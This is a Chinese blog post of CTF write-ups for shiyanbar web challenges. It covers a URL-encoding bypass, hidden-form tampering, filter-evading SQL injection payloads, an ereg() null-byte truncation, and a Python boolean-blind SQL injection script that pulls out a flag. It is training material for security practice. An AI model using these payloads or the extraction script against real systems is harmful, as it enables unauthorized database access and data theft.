实验吧——WriteUp&&涨姿势(2)

最新推荐文章于 2022-07-18 22:33:13 发布
最新推荐文章于 2022-07-18 22:33:13 发布
阅读量705 收藏 2
点赞数 2
分类专栏: CTF 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_34200786/article/details/71908266
版权

WriteUp

  1. PHP大法
  2. Forms
  3. 简单sql注入
  4. 简单sql注入2

涨姿势

  1. Once More
  2. 简单sql注入3

PHP大法

原题

这里写图片描述

解题思路

index.php.txt代码审计

WriteUp

浏览器访问index.php.txt
http://ctf5.shiyanbar.com/DUTCTF/index.php.txt

这里写图片描述

代码首先判断 'hackerDJ' 是否是 $_GET[id]的子串,是就退出
不然对 $_GET[id]进行urldecode
然后判断 'hackerDJ' == $_GET[id] ,相等则输出flag
所以只需对参数urlencode即可,需要注意的是需要encode两次,因为浏览器
会自动对urlencode的参数进行decode
playload
http://ctf5.shiyanbar.com/DUTCTF/index.php?id=%25%36%38%25%36%31%25%36%33%25%36%62%25%36%35%25%37%32%25%34%34%25%34%61

这里写图片描述

Forms

原题

这里写图片描述

解题思路

页面源代码发现有个隐藏表单

WriteUp

隐藏表单可以利用

这里写图片描述

随便输入一个PIN,Burp Suite抓包分析

这里写图片描述

隐藏表单出现了,试试不修改直接发送

这里写图片描述

报错,那改成和PIN一样的

这里写图片描述

获取到源码

这里写图片描述

将那一串数字输入即可

这里写图片描述

简单sql注入

原题

这里写图片描述

解题思路

盲注试出过滤的关键词

WriteUp

加‘ 号报错,'=' 爆出数据,猜测查询语句为:
select name from xxx where id = ''

这里写图片描述

继续测试playload
1: 1' or exists(select * from admin) and ''='
2: 1' or exists(selectselect * fromfrom admin) and ''='
3: 1'  or  exists(selectselect  * fromfrom  admin)  andand  ''='
对应报错如下,判断双写可绕过过滤

这里写图片描述

这里写图片描述

这里写图片描述

判断表名:1'  or  exists(selectselect  *  fromfrom  flag)  andand  ''='
判断列名:1'  or  exists(selectselect  flag  fromfrom  flag)  andand  ''='
联合查询:1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  ''='

这里写图片描述

简单sql注入2

原题

解题思路

过滤了空格而已

WriteUp

playload:1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/''='

这里写图片描述

Once More

原题

这里写图片描述

解题思路

ereg()%00截断漏洞

WriteUp

根据题目要求,password只能出现字母和数字,长度小于8,值大于9999999,包含*-*
第一个要求:%00截断,隐藏后面的*-*
第二个要求:科学记数法
第三个要求:在password末尾加上*-*
playload: 1e9%00*-*

这里写图片描述

涨姿势点

ereg()的%00截断漏洞

备注

strlen()和字符串转数字还可以再看看

简单sql注入3

原题

这里写图片描述

解题思路

Bool 盲注,看是否报错确定注入代码的正确性

WriteUp

测试playload
1. 1' and exists(select * from admin) and ''='
2. 1' and exists(select flag from flag) and ''='
3. 1' and exists(select name from flag) and ''='

这里写图片描述

这里写图片描述

注入正确就显示Hello,错误则提示相应信息,所以可以根据是否输出Hello判断注入的正确性
爆出表名flag和列名flag,逐个爆flag列的字符即可
import requests
flag = ''
for i in range(1,30):
    for n in range(33,126):
         url = 'http://ctf5.shiyanbar.com/web/index_3.php?id=1%27%20and%20ascii(substr((select%20flag%20from%20flag),'+str(i)+',1))='+str(n)+'%23'
         html = requests.get(url).text
         if 'Hello' in html:
             flag += chr(n)
             break
print(flag)

涨姿势点

Bool盲注的首次接触与应用,理解了什么是Bool盲注并简单利用
浅零半泣
关注
专栏目录
南邮CTF-部分题目writeup
gfoooooo的博客
10-15 2411
    1.签到题 题目非常简单,在审查元素中就可以发现flag 题目传送门:http://chinalover.sinaapp.com/web1/ 2.md5 collision 这道题利用了php的弱比较和md5值碰撞 而源码要求a和QNKCDZO的md5值相同,但a和它不相等 QNKCDZO的md5值为:0e830400451993494058024219903391 ...
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 673
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL 中 utf8_unicode_ci 和 utf8_general...
[SUCTF 2019]EasySQL 1
m0_69637056的博客
07-18 389
sql
为什么select * || flag from flag 不行呢?
wojiushilsy的博客
04-27 1608
首先*(星号)在SQL语句中有特殊的意义。应该是保留字或关键字 (没找到*(星号)属于什么) 。 所以你直接使用 select * || flag from flag 会报语法错误。 实验一: 这是一张表 查询语句 SELECT *||mpassword FROM rjqm.manager; 结果: 和查询语句 SELECT .||mpassword FROM rjqm.manager; 结果是...
[2021首届“陇剑杯”网络安全大赛] SQL注入
ShenZ的博客
09-15 1351
题目描述 某应用程序被攻击,请分析日志后作答: 黑客在注入过程中采用的注入手法叫_____________。(格式为4个汉字,例如“拼搏努力”) 黑客在注入过程中,最终获取flag的数据库名、表名和字段名是_____________。(格式为“数据库名#表名#字段名”,例如database#table#column) 黑客最后获取到的flag字符串为_____________。 ...
实验吧——WriteUp&&姿势(1)
困难是否磨灭你的自信
04-15 1814
WP1.NSCTF web200 2.Forbidden 3.猫抓老鼠姿势1.上传绕过 2.Guess Next Session 3.天下武功唯快不破 4.what a fuck!这是什么鬼东西? 5.头有点大NSCTF web200
实验吧——WriteUP&&姿势(6)
困难是否磨灭你的自信
06-14 1467
WriteUp RSA实践 一串奇怪的数 兔子你好 NSCTF crypto200 姿势 RSAROLL 凯撒和某某加密
HBCTF——WriteUp&&姿势(1)
困难是否磨灭你的自信
04-09 1194
这次学到了三个姿势 1.CRC校验 2.Zip伪加密 3.PHP伪协议CRC校验
whaleCTF 杂项_Writeup
Pad0y的博客
04-21 2972
Decode1 整道题的一个思路是 hex–>ascii–>url–>base64–>ascii–&a
XXE(XML External Entity attack)XML外部实体注入攻击
xiaoi123的博客
08-15 2190
导语   XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。   尽管XXE漏洞已经...
1.实验吧——sql注入1(flag,到底过滤了什么东西? )
qwsn
11-08 3690
0x01:题目 实验吧——sql注入1网址 题目 http://ctf5.shiyanbar.com/423/web/ flag,到底过滤了什么东西? 0x02:WP复现 1.正常访问: http://ctf5.shiyanbar.com/423/web/ #如下图所示 2.输入单引号'测试: 在输入框里输入:' #如图所示,为GET型注入+字符型注入 http:/...
由sqli-labs/Less-5学习各种基础盲注技巧
Sea_Sand息禅
02-10 613
本文为本人在学习中的总结,仅涉及基础的盲注技巧,可能多有疏漏之处,欢迎指教。 另外本人博客的SQL注入分类下有一些方面的详细讲解,在此只介绍简单的使用。 0x00、介绍一下本人对盲注的总结。 盲注就是在没有回显的结果下进行推断性的注入,这样我们有几种办法来注入: 1、根据页面正常与否判断payload是否正确(基于bool的盲注) 2、想办法让页面产生回显(个人感觉这个比较好用)(基于报...
实验吧简单的SQL注入三连击
wenake的博客
03-06 274
简单的sql注入1 检查注入点特征,发现对某些关键字有过滤 爆出所有的数据库名 双写绕过 方法1 http://ctf5.shiyanbar.com/423/web/?id=%27%20unionunion%20%20selectselect%20%20schema_name%20%20fromfrom%20%20information_schema.schemata%20wherewhere...
CTFweb篇-SQL注入(二)
weixin_44597701的博客
08-15 287
盲注 基于布尔的盲注 基于布尔的盲注,就是传入注入的值,服务器那边只是返回True或者False SQL语句一点注意点 如果原句是select * from table where id = ‘x’ 这里x可以是1",1")等,大概原理跟上一篇的"x"情形一样,但是这里不能是 x’ Less8 传入 http://127.0.0.1/sqli-labs-master/Less-8/?id=1 正常显示 传入id=1",id=1"),id=1’也是正常显示 但是当传入id=1’时 ...
初识CTF Day2 CTFHUB密码口令&SQL注入
suxinAL的博客
09-27 885
前言 接着上次的继续往下做 git泄露结束了,现在开始看svn和hg 正文 首先看一下信息泄露部分的svn和hg 这里使用到一个工具dvcs-ripper 下载地址如下 https://github.com/kost/dvcs-ripper.git (注意:该工具一定要配置环境,具体如下图,或者查看readme.md) 安装好工具就简单了,我是在kali虚拟机里进行使用的 具体指令如下 cd dvcs-ripper-master ./rip-svn.pl -v -u http://challenge-d
CTF中文件包含漏洞总结
热门推荐
Lethe's Blog
02-13 5万+
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否...
BUUCTF-WEB(17-33)
菜鸡程序员的博客
05-15 1781
BUUCTF-WEB(17-33) 17.[极客大挑战 2019]BabySQL 这道题和之前的两道是一个系列的,先尝试一下继续用万能密码1' or 1=1#,试过之后报错 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1=1#' and password='1" at line
CTF学习-web解题思路
菜鸟-传奇
08-27 8719
CTF学习-web题思路 持续更新 基础篇 1.直接查看源代码 2.修改或添加HTTP请求头 常见的有: Referer来源伪造 X-Forwarded-For:ip伪造 User-Agent:用户代理(就是用什么浏览器什么的) //.net的版本修改,后面添加,如版本9 .NET CLR 9 Accept-Language:语言 Cookie的修改 3.查看HTTP请求头或响应头...
sql盲注脚本
、moddemod
06-14 1008
# moddemod # 2019/6/13 # 8:23 # PyCharm import requests import re """ base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1" """ base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1" class Blind(object...
2020 YCBCTF羊城杯官方Writeup:PHP与Web安全解题技巧实录
2020YCBCTF羊城杯官方Writeup是一份详细的竞赛报告,涵盖了该年度网络安全 Capture The Flag (CTF) 比赛中的一系列挑战,主要集中在Web、PHP、漏洞利用、密码学、以及逆向工程等不同领域。以下是各个部分的主要知识...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值